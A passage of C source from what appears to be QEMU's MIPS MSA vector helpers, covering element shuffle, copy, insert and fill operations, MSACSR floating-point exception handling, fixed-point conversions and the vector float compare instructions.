&(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ wr_t wx, *pwx = &wx; \ uint32_t i; \ switch (df) { \ case DF_BYTE: \ MSA_LOOP_B; \ break; \ case DF_HALF: \ MSA_LOOP_H; \ break; \ case DF_WORD: \ MSA_LOOP_W; \ break; \ case DF_DOUBLE: \ MSA_LOOP_D; \ break; \ default: \ assert(0); \ } \ msa_move_v(pwd, pwx); \ } #define MSA_LOOP_COND(DF) \ (DF_ELEMENTS(DF) / 2) #define Rb(pwr, i) (pwr->b[i]) #define Lb(pwr, i) (pwr->b[i + DF_ELEMENTS(DF_BYTE) / 2]) #define Rh(pwr, i) (pwr->h[i]) #define Lh(pwr, i) (pwr->h[i + DF_ELEMENTS(DF_HALF) / 2]) #define Rw(pwr, i) (pwr->w[i]) #define Lw(pwr, i) (pwr->w[i + DF_ELEMENTS(DF_WORD) / 2]) #define Rd(pwr, i) (pwr->d[i]) #define Ld(pwr, i) (pwr->d[i + DF_ELEMENTS(DF_DOUBLE) / 2]) #undef MSA_LOOP_COND #define MSA_LOOP_COND(DF) \ (DF_ELEMENTS(DF)) #define MSA_DO(DF) \ do { \ uint32_t n = DF_ELEMENTS(df); \ uint32_t k = (pwd->DF[i] & 0x3f) % (2 * n); \ pwx->DF[i] = \ (pwd->DF[i] & 0xc0) ? 0 : k < n ? 
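/* VSHF control byte: bits 6-7 set select zero, otherwise k indexes the concatenated {wt, ws} register pair */ \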
pwt->DF[k] : pws->DF[k - n]; \ } while (0) MSA_FN_DF(vshf_df) #undef MSA_DO #undef MSA_LOOP_COND #undef MSA_FN_DF void helper_msa_sldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_sld_df(df, pwd, pws, n); } void helper_msa_splati_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_splat_df(df, pwd, pws, n); } void helper_msa_copy_s_b(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 16; #if defined(HOST_WORDS_BIGENDIAN) if (n < 8) { n = 8 - n - 1; } else { n = 24 - n - 1; } #endif env->active_tc.gpr[rd] = (int8_t)env->active_fpu.fpr[ws].wr.b[n]; } void helper_msa_copy_s_h(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 8; #if defined(HOST_WORDS_BIGENDIAN) if (n < 4) { n = 4 - n - 1; } else { n = 12 - n - 1; } #endif env->active_tc.gpr[rd] = (int16_t)env->active_fpu.fpr[ws].wr.h[n]; } void helper_msa_copy_s_w(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 4; #if defined(HOST_WORDS_BIGENDIAN) if (n < 2) { n = 2 - n - 1; } else { n = 6 - n - 1; } #endif env->active_tc.gpr[rd] = (int32_t)env->active_fpu.fpr[ws].wr.w[n]; } void helper_msa_copy_s_d(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 2; env->active_tc.gpr[rd] = (int64_t)env->active_fpu.fpr[ws].wr.d[n]; } void helper_msa_copy_u_b(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 16; #if defined(HOST_WORDS_BIGENDIAN) if (n < 8) { n = 8 - n - 1; } else { n = 24 - n - 1; } #endif env->active_tc.gpr[rd] = (uint8_t)env->active_fpu.fpr[ws].wr.b[n]; } void helper_msa_copy_u_h(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 8; #if defined(HOST_WORDS_BIGENDIAN) if (n < 4) { n = 4 - n - 1; } else { n = 12 - n - 1; } #endif env->active_tc.gpr[rd] = (uint16_t)env->active_fpu.fpr[ws].wr.h[n]; } void helper_msa_copy_u_w(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 4; #if defined(HOST_WORDS_BIGENDIAN) if (n < 2) { n = 2 - n - 1; } else { n = 6 - n - 1; } #endif env->active_tc.gpr[rd] = (uint32_t)env->active_fpu.fpr[ws].wr.w[n]; } void helper_msa_insert_b(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 16; #if defined(HOST_WORDS_BIGENDIAN) if (n < 8) { n = 8 - n - 1; } else { n = 24 - n - 1; } #endif pwd->b[n] = (int8_t)rs; } void helper_msa_insert_h(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 8; #if defined(HOST_WORDS_BIGENDIAN) if (n < 4) { n = 4 - n - 1; } else { n = 12 - n - 1; } #endif pwd->h[n] = (int16_t)rs; } void helper_msa_insert_w(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 4; #if defined(HOST_WORDS_BIGENDIAN) if (n < 2) { n = 2 - n - 1; } else { n = 6 - n - 1; } #endif pwd->w[n] = (int32_t)rs; } void helper_msa_insert_d(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 2; pwd->d[n] = (int64_t)rs; } void helper_msa_insve_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = 
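/* INSVE.df: element 0 of ws replaces element n of wd; the remaining elements of wd are preserved */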
&(env->active_fpu.fpr[ws].wr); switch (df) { case DF_BYTE: pwd->b[n] = (int8_t)pws->b[0]; break; case DF_HALF: pwd->h[n] = (int16_t)pws->h[0]; break; case DF_WORD: pwd->w[n] = (int32_t)pws->w[0]; break; case DF_DOUBLE: pwd->d[n] = (int64_t)pws->d[0]; break; default: assert(0); } } void helper_msa_ctcmsa(CPUMIPSState *env, target_ulong elm, uint32_t cd) { switch (cd) { case 0: break; case 1: env->active_tc.msacsr = (int32_t)elm & MSACSR_MASK; restore_msa_fp_status(env); /* check exception */ if ((GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED) & GET_FP_CAUSE(env->active_tc.msacsr)) { do_raise_exception(env, EXCP_MSAFPE, GETPC()); } break; } } target_ulong helper_msa_cfcmsa(CPUMIPSState *env, uint32_t cs) { switch (cs) { case 0: return env->msair; case 1: return env->active_tc.msacsr & MSACSR_MASK; } return 0; } void helper_msa_fill_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t rs) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwd->b[i] = (int8_t)env->active_tc.gpr[rs]; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwd->h[i] = (int16_t)env->active_tc.gpr[rs]; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwd->w[i] = (int32_t)env->active_tc.gpr[rs]; } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { pwd->d[i] = (int64_t)env->active_tc.gpr[rs]; } break; default: assert(0); } } #define FLOAT_ONE32 make_float32(0x3f8 << 20) #define FLOAT_ONE64 make_float64(0x3ffULL << 52) #define FLOAT_SNAN16(s) (float16_default_nan(s) ^ 0x0220) /* 0x7c20 */ #define FLOAT_SNAN32(s) (float32_default_nan(s) ^ 0x00400020) /* 0x7f800020 */ #define FLOAT_SNAN64(s) (float64_default_nan(s) ^ 0x0008000000000020ULL) /* 0x7ff0000000000020 */ static inline void clear_msacsr_cause(CPUMIPSState *env) { SET_FP_CAUSE(env->active_tc.msacsr, 0); } static inline void check_msacsr_cause(CPUMIPSState *env, uintptr_t retaddr) { if ((GET_FP_CAUSE(env->active_tc.msacsr) & (GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED)) == 0) { UPDATE_FP_FLAGS(env->active_tc.msacsr, GET_FP_CAUSE(env->active_tc.msacsr)); } else { do_raise_exception(env, EXCP_MSAFPE, retaddr); } } /* Flush-to-zero use cases for update_msacsr() */ #define CLEAR_FS_UNDERFLOW 1 #define CLEAR_IS_INEXACT 2 #define RECIPROCAL_INEXACT 4 static inline int update_msacsr(CPUMIPSState *env, int action, int denormal) { int ieee_ex; int c; int cause; int enable; ieee_ex = get_float_exception_flags(&env->active_tc.msa_fp_status); /* QEMU softfloat does not signal all underflow cases */ if (denormal) { ieee_ex |= float_flag_underflow; } c = ieee_ex_to_mips(ieee_ex); enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; /* Set Inexact (I) when flushing inputs to zero */ if ((ieee_ex & float_flag_input_denormal) && (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { if (action & CLEAR_IS_INEXACT) { c &= ~FP_INEXACT; } else { c |= FP_INEXACT; } } /* Set Inexact (I) and Underflow (U) when flushing outputs to zero */ if ((ieee_ex & float_flag_output_denormal) && (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { c |= FP_INEXACT; if (action & CLEAR_FS_UNDERFLOW) { c &= ~FP_UNDERFLOW; } else { c |= FP_UNDERFLOW; } } /* Set Inexact (I) when Overflow (O) is not enabled */ if ((c & FP_OVERFLOW) != 0 && (enable & FP_OVERFLOW) == 0) { c |= FP_INEXACT; } /* Clear Exact Underflow when Underflow (U) is not enabled */ if ((c & FP_UNDERFLOW) != 0 && (enable & FP_UNDERFLOW) == 0 && (c & FP_INEXACT) == 0) { c &= 
~FP_UNDERFLOW; } /* * Reciprocal operations set only Inexact when valid and not * divide by zero */ if ((action & RECIPROCAL_INEXACT) && (c & (FP_INVALID | FP_DIV0)) == 0) { c = FP_INEXACT; } cause = c & enable; /* all current enabled exceptions */ if (cause == 0) { /* * No enabled exception, update the MSACSR Cause * with all current exceptions */ SET_FP_CAUSE(env->active_tc.msacsr, (GET_FP_CAUSE(env->active_tc.msacsr) | c)); } else { /* Current exceptions are enabled */ if ((env->active_tc.msacsr & MSACSR_NX_MASK) == 0) { /* * Exception(s) will trap, update MSACSR Cause * with all enabled exceptions */ SET_FP_CAUSE(env->active_tc.msacsr, (GET_FP_CAUSE(env->active_tc.msacsr) | c)); } } return c; } static inline int get_enabled_exceptions(const CPUMIPSState *env, int c) { int enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; return c & enable; } static inline float16 float16_from_float32(int32_t a, flag ieee, float_status *status) { float16 f_val; f_val = float32_to_float16((float32)a, ieee, status); return a < 0 ? (f_val | (1 << 15)) : f_val; } static inline float32 float32_from_float64(int64_t a, float_status *status) { float32 f_val; f_val = float64_to_float32((float64)a, status); return a < 0 ? (f_val | (1 << 31)) : f_val; } static inline float32 float32_from_float16(int16_t a, flag ieee, float_status *status) { float32 f_val; f_val = float16_to_float32((float16)a, ieee, status); return a < 0 ? (f_val | (1 << 31)) : f_val; } static inline float64 float64_from_float32(int32_t a, float_status *status) { float64 f_val; f_val = float32_to_float64((float64)a, status); return a < 0 ? (f_val | (1ULL << 63)) : f_val; } static inline float32 float32_from_q16(int16_t a, float_status *status) { float32 f_val; /* conversion as integer and scaling */ f_val = int32_to_float32(a, status); f_val = float32_scalbn(f_val, -15, status); return f_val; } static inline float64 float64_from_q32(int32_t a, float_status *status) { float64 f_val; /* conversion as integer and scaling */ f_val = int32_to_float64(a, status); f_val = float64_scalbn(f_val, -31, status); return f_val; } static inline int16_t float32_to_q16(float32 a, float_status *status) { int32_t q_val; int32_t q_min = 0xffff8000; int32_t q_max = 0x00007fff; int ieee_ex; if (float32_is_any_nan(a)) { float_raise(float_flag_invalid, status); return 0; } /* scaling */ a = float32_scalbn(a, 15, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_overflow) { float_raise(float_flag_inexact, status); return (int32_t)a < 0 ? q_min : q_max; } /* conversion to int */ q_val = float32_to_int32(a, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_invalid) { set_float_exception_flags(ieee_ex & (~float_flag_invalid) , status); float_raise(float_flag_overflow | float_flag_inexact, status); return (int32_t)a < 0 ? 
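/* the sign bit of the scaled float32 picks the saturation bound */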
q_min : q_max; } if (q_val < q_min) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int16_t)q_min; } if (q_max < q_val) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int16_t)q_max; } return (int16_t)q_val; } static inline int32_t float64_to_q32(float64 a, float_status *status) { int64_t q_val; int64_t q_min = 0xffffffff80000000LL; int64_t q_max = 0x000000007fffffffLL; int ieee_ex; if (float64_is_any_nan(a)) { float_raise(float_flag_invalid, status); return 0; } /* scaling */ a = float64_scalbn(a, 31, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_overflow) { float_raise(float_flag_inexact, status); return (int64_t)a < 0 ? q_min : q_max; } /* conversion to integer */ q_val = float64_to_int64(a, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_invalid) { set_float_exception_flags(ieee_ex & (~float_flag_invalid) , status); float_raise(float_flag_overflow | float_flag_inexact, status); return (int64_t)a < 0 ? q_min : q_max; } if (q_val < q_min) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int32_t)q_min; } if (q_max < q_val) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int32_t)q_max; } return (int32_t)q_val; } #define MSA_FLOAT_COND(DEST, OP, ARG1, ARG2, BITS, QUIET) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ int64_t cond; \ set_float_exception_flags(0, status); \ if (!QUIET) { \ cond = float ## BITS ## _ ## OP(ARG1, ARG2, status); \ } else { \ cond = float ## BITS ## _ ## OP ## _quiet(ARG1, ARG2, status); \ } \ DEST = cond ? 
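/* MSA FP compares write all-ones on true, all-zeros on false */ \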
M_MAX_UINT(BITS) : 0; \ c = update_msacsr(env, CLEAR_IS_INEXACT, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) #define MSA_FLOAT_AF(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ if ((DEST & M_MAX_UINT(BITS)) == M_MAX_UINT(BITS)) { \ DEST = 0; \ } \ } while (0) #define MSA_FLOAT_UEQ(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_NE(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_UNE(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ } \ } \ } while (0) #define MSA_FLOAT_ULE(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_ULT(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_OR(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, le, ARG2, ARG1, BITS, QUIET); \ } \ } while (0) static inline void compare_af(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_AF(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_AF(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_un(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], unordered, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], unordered, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_eq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], eq, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], eq, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ueq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case 
DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UEQ(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UEQ(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_lt(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], lt, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], lt, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ult(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_ULT(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_ULT(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_le(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], le, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], le, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ule(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_ULE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_ULE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_or(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_OR(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_OR(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_une(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); 
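/* commit the result only after the trap check: a raised exception unwinds here and leaves wd unmodified */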
msa_move_v(pwd, pwx); } static inline void compare_ne(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_NE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_NE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } void helper_msa_fcaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_af(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_un(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fceq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_eq(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ueq(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fclt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_lt(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ult(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_le(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ule(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fsaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_af(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_un(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fseq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); 
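/* FS*.df compares are signaling (quiet == 0): any NaN operand raises Invalid, unlike the quiet FC*.df forms above */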
compare_eq(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ueq(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fslt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_lt(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ult(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_le(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = 